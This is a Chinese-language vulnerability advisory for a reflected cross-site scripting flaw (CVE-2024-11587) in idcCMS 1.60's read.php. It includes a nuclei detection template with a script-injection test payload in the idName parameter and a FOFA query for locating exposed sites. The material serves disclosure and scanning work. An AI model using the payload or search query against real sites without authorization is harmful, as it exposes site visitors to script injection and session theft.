idcCMS V160 跨站脚本漏洞

漏洞信息

漏洞名称: idcCMS V1.60 跨站脚本漏洞

漏洞编号:

  • CVE: CVE-2024-11587

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: idcCMS是一款内容管理系统,广泛用于网站建设和内容管理。其1.60版本存在一个反射型跨站脚本(XSS)漏洞,通过read.php文件中的idName参数,攻击者可以注入恶意脚本。由于用户输入未经适当清理,恶意脚本会在用户浏览器中执行,导致跨站脚本攻击。这种漏洞的根源在于对用户输入的处理不当,未能有效过滤或转义潜在的恶意代码。攻击者可以利用此漏洞窃取用户的会话令牌、重定向用户到恶意网站或在用户浏览器中执行任意代码,从而对网站的安全性和用户的隐私构成威胁。此漏洞的利用不需要用户认证,且可以远程执行,增加了其潜在的危险性。

产品厂商: idccms

产品名称: idccms

影响版本: 1.60

搜索语法: title=”idcCMS”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/ccc3d586a523b7748f5b2e4790972ac52723b825/http%2Fcves%2F2024%2FCVE-2024-11587.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

id: CVE-2024-11587

info:
name: idcCMS V1.60 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
reference:
- https://github.com/Hebing123/cve/issues/75
- https://nvd.nist.gov/vuln/detail/CVE-2024-11587
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-11587
cwe-id: CWE-79
cpe: cpe:2.3:a:idccms:idccms:1.60:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: idccms
product: idccms
fofa-query: title="idcCMS"
tags: cve,cve2024,xss,idccms

http:
- method: GET
path:
- "{{BaseURL}}/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData"

matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'add(new Option'
condition: and

- type: word
part: content_type
words:
- 'text/html'

- type: status
status:
- 200


idcCMS V160 跨站脚本漏洞
http://example.com/2025/07/16/github_1421069296/
作者
lianccc
发布于
2025年7月16日
许可协议